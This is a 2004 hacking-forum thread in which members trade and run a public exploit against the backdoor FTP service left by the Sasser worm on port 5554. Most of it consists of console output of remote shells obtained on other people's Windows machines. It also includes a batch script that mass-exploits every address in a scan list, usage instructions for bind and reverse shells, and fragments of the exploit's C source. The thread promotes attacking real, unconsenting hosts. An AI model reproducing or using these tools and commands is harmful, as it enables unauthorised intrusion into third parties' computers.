got someshell with XP but no succes for 2k at the moment did some one success with 2k??
cyrixx
May 9 2004, 06:43 PM
CODE
[%] mandragore's sploit v1.3 for sasser.x [.] launching attack on xxx:5554.. [.] will try to put a bindshell on port 9875. [.] using type 'wXP SP1 all' [+] connected, sending exploit [+] connected!
Microsoft Windows XP [Versione 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\CCONTALDI>ipconfig ipconfig
Configurazione IP di Windows
Scheda Ethernet Connessione alla rete locale (LAN):
So, it does works if you use diff offset on one ip ? Hope it does.... Thanks for the exploit & Compiling edit:// it does work, thnx guys
xdccpt
May 9 2004, 08:04 PM
it works on xp 5554
looks like if u choose the wrong OS the exploit crashes...we need to find a way to ident the OS first
i tried the check.exe but it seems that we need the port 135 open to ident the OS.
Anyway...its working
Sinister
May 9 2004, 08:16 PM
great tool
only when i try sending sploit... then he says timed out
Max_Payne
May 9 2004, 08:51 PM
OMG...i got a shell on the IP i tested..guess i'm just lucky..
cheers dude..this proves that the exploit works
THoRaX
May 9 2004, 08:55 PM
CODE
@echo off TITLE sasser.x exploit Auto-HAXOR by THoRaX CLS ECHO TTTTTT HH HH OOOOOO RRRR AA XX XX ECHO TT HH HH OO OO RR RR AAAA XX XX ECHO TT HHHHHH OO OO RRRR AA AA XXX ECHO TT HH HH OO OO RR RR AAAAAAAA XX XX ECHO TT HH HH OOOOOO RR RR AA AA XX XX echo ......................... echo .THoRaX Proudly Presents. echo ......................... pause echo _______________________________________ echo -=[ sasser.x exploit auto-HAXOR by THoRaX ]=- echo ===================================== pause If "scan.txt" =="" GoTo EXIT for /f "eol=; tokens=1*" %%i in (scan.txt) do sasser.exe -d %%i -p 5554 -P 9875 -t 0
autohacker..
dunno if it works haven't tested it myself yet..
MAKE SURE THE NAME OF THE .EXE IS CALLED "SASSER.EXE"
x1`
May 9 2004, 08:58 PM
if u dont use -p option it will bind to default port without netcat? thorax u forgot to post the file
THoRaX
May 9 2004, 09:14 PM
QUOTE (Dickybob20 @ May 9 2004, 08:58 PM)
if u dont use -p option it will bind to default port without netcat? thorax u forgot to post the file
just paste it in a .txt and save as hacker.bat
x1`
May 9 2004, 09:24 PM
do we have to fill in our ip next to the shell port sasser.exe -d xxx.xxx.xxx.xxx -P 400 -t 0 this should work? do i need to make netcat listen now on port 400 can someone confirm or if i dont use the -P option it will default on 5300 sasser.exe -d xxx.xxx.xxx.xxx -t 0
THoRaX
May 9 2004, 09:29 PM
QUOTE (Dickybob20 @ May 9 2004, 09:24 PM)
do we have to fill in our ip next to the shell port sasser.exe -d xxx.xxx.xxx.xxx -P 400 -t 0 this should work? do i need to make netcat listen now on port 400 can someone confirm
scan for port 5554 let's say you have the ip 192.168.0.2 in your scan.txt.
then do:
sasser.exe -d 192.168.0.2 -p 5554 -P 9875 -t 0
then in the SAME window as you exploit you will get the shell, so no netcat is needed, you can also choose the reverse shell option, then you DO need netcat
x1`
May 9 2004, 09:51 PM
i think my isp is blocking this port already , i am scanning remote then i try and scan the same ip from my machine , :/ scanner cant pick it up
hulk
May 9 2004, 10:05 PM
this is what I got lol
CODE
[%] mandragore's sploit v1.3 for sasser.x [.] launching attack on xxxxx:5554.. [.] will try to put a bindshell on port 2500. [.] using type 'wXP SP1 all' [+] connected, sending exploit [+] connected!
4A?SÉS♣ù»-"c"EI{Ee?.?Då∟xFYxx?OA2l▲>d)fDA)9Oc~-UAO+{U$¶î_?d_j_Ö.«↕[z7aiħá2E Y8?yo→[kW»¶5àFR4I?H3xJa♂DSMaÇ^«ß·nEºz▌º/Y/cyG▬\[↨♂ l☺0↔Do♂]-éE╪eEz«¶qùYdE-r ?OqIbRäOv¥bIZpI·Ç~ É+▌↓¶zx§JrOÖ.ú,8í♥û"zgº☼♠ [-] shell.recv(socket): No error
i got that one to.. except it just kept flooding with that shit.. for like 1 min then the speeker in my pc started beeping o.o
xdccpt
May 9 2004, 10:48 PM
what we need its a way to ident the OS first!!!
drizzlah
May 9 2004, 10:59 PM
very nice m8 go to take @ look at this
dw2k
May 10 2004, 12:21 AM
looks nice but iv yet to get a shell think its dead already lol
Hellraiseruk
May 10 2004, 12:29 AM
all i seem to get is
connected, sending exploit
then just stays on that screen lol
very strange or very dead hehe
anyone else haveing that prob..
totof
May 10 2004, 12:51 AM
thanks for this ecploits saser i test that
tazthedev
May 10 2004, 02:09 AM
well.... i found some ip, but it hang allways on .... Connected, sending exploits...
no shell.... nothing happens next
whats wrong ? i used the autohax
JdEeZy
May 10 2004, 02:14 AM
I believe only the WINDOWS XP works... So ya gotta find a box thats XP...
Krogoth
May 10 2004, 05:07 AM
going to give it a try great job m8
Hyp3r
May 10 2004, 05:46 AM
its stupid, always i have a shell but all the time i get this
[%] mandragore's sploit v1.3 for sasser.x [.] launching attack on 69.xx.65.xx:5554.. [.] will try to put a bindshell on port 5300. [.] using type 'w2k SP4 all' [+] connected, sending exploit [+] connected!
D:\Eigene Dateien\Hackz\howtohack\lsass\sasser\auto>exploit.bat 69.xx.81.xx echo 69.12.81.10 [%] mandragore's sploit v1.3 for sasser.x [.] launching attack on 69.xx.81.xx:5554.. [.] will try to put a bindshell on port 5300. [.] using type 'wXP SP1 all' [+] connected, sending exploit [+] connected!
Enter username>Batchvorgang abbrechen (J/N)? n [%] mandragore's sploit v1.3 for sasser.x [.] launching attack on xx.12.xx.10:5554.. [.] will try to put a bindshell on port 5300. [.] using type 'w2k SP4 all' [+] connected, sending exploit [+] connected!
D:\Eigene Dateien\Hackz\howtohack\lsass\sasser\auto>exploit.bat 69.xx.xx.11 echo 69.12.81.11 [%] mandragore's sploit v1.3 for sasser.x [.] launching attack on 69.xx.xx.11:5554.. [.] will try to put a bindshell on port 5300. [.] using type 'wXP SP1 all' [+] connected, sending exploit [+] connected!
Enter username>Batchvorgang abbrechen (J/N)? n [%] mandragore's sploit v1.3 for sasser.x [.] launching attack on xx.12.xx.11:5554.. [.] will try to put a bindshell on port 5300. [.] using type 'w2k SP4 all' [+] connected, sending exploit [+] connected!
Enter username>aa aa aa aa Batchvorgang abbrechen (J/N)? n
D:\Eigene Dateien\Hackz\howtohack\lsass\sasser\auto>exploit.bat 69.xx.81.xx echo 69.12.81.13 [%] mandragore's sploit v1.3 for sasser.x [.] launching attack on 69.xx.81.xx:5554.. [.] will try to put a bindshell on port 5300. [.] using type 'wXP SP1 all' [+] connected, sending exploit [+] connected!
Enter username>Batchvorgang abbrechen (J/N)? n [%] mandragore's sploit v1.3 for sasser.x [.] launching attack on xx.12.xx.13:5554.. [.] will try to put a bindshell on port 5300. [.] using type 'w2k SP4 all' [+] connected, sending exploit [+] connected!
I'm not positive but I've seen that before with the lovegate exploit
tibbar
May 10 2004, 06:33 AM
Hyp3r you just broke forum rules. No posting actual ip addresses....in fact you just incriminated yourself for hacking ppl...nice one...i hope you are proxied here!
toska
May 10 2004, 09:02 AM
tsk tsk tsk
n0vun
May 10 2004, 10:07 AM
i tried it but it does not work very well
B3T4
May 10 2004, 11:38 AM
lol, now we can do what the bot has been doing for a week : \
predx
May 10 2004, 01:34 PM
hey thanks for the exploit and code!!!
Milka
May 10 2004, 04:12 PM
Tnx m8 gonna look at this one now;)
Hellraiseruk
May 10 2004, 04:27 PM
now we need a checker that tell us if its xp machine or not and was SP cuz i still haven't had any luck think exploit bit pointless
h4x0re
May 10 2004, 05:13 PM
QUOTE (tibbar @ May 10 2004, 06:33 AM)
Hyp3r you just broke forum rules. No posting actual ip addresses....in fact you just incriminated yourself for hacking ppl...nice one...i hope you are proxied here!
lol
Alex Trust
May 10 2004, 05:55 PM
thanx guys works fine for me got in the first one i tried
for os checking the check.exe from cyrex lsass autohaxor does the job
Hellraiseruk
May 10 2004, 05:59 PM
check.exe did't really work anyway..could't connect for some reason
Alex Trust
May 10 2004, 06:08 PM
and the reason is ? works fine for me hellraiseruk
Tool
May 10 2004, 06:33 PM
I keep getting this
C:\Sploit>sasser -d xxx.x.xxx.xxx-P 9875 -t 0 [%] mandragore's sploit v1.3 for sasser.x [.] launching attack on xxx.x.xxx.xxx:5554.. [.] will try to put a bindshell on port 9875. [.] using type 'wXP SP1 all' [+] connected, sending exploit
and it just hangs there, what am i doing wrong? as far as i can see every who has gotten a shell has been using the same command. It either just hangs or says connection refused or exploit probably failed...........
The Storm
May 10 2004, 07:04 PM
on my box he says connected! and then there`s nothing going on what am I doin wrong?
THoRaX
May 10 2004, 07:10 PM
just bad luck you guys..
Tool
May 10 2004, 07:21 PM
we doing the commands right though?
sasser -d 192.0.1.0 -P 9875 -t 0
is that right? and i don't need nc listening or anything right? the shell should just come up in the same window
toska
May 10 2004, 07:24 PM
New version 1.4 with new offsets by mandragore -----------------------------------------------------------------------------------
author: mandragore date: Mon May 10 16:13:31 2004 vuln type: SEH ptr overwriting greets: rosecurity team discovery: edcba note: sasser.e has its ftpd on port 1023 update: offsets
printf("[.] launching attack on %s:%d..\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),port); if (bindopt) printf("[.] will try to put a bindshell on port %d.\n",Port); else { if ((he=gethostbyname(Host))==NULL) fatal("[-] gethostbyname() for -H"); rip=*((long *)he->h_addr_list[0]); rip=rip^0xdededede; memcpy(rsh+0x53,&rip,4); if (pid) { printf("[.] setting up a listener on port %d.\n",Port); pid=fork(); switch (pid) { case 0: callback(Port); } } else printf("[.] you should have a listener on %s:%d.\n",inet_ntoa(*((struct in_addr *)he->h_addr_list[0])),Port); }
printf("[.] using type '%s'\n",targets[type].os);
// -------------------- core
s=socket(2,1,6);
if (connect(s,(struct sockaddr *)&sin,16)!=0) { if (pid) kill(pid,SIGKILL); fatal("[-] connect()"); }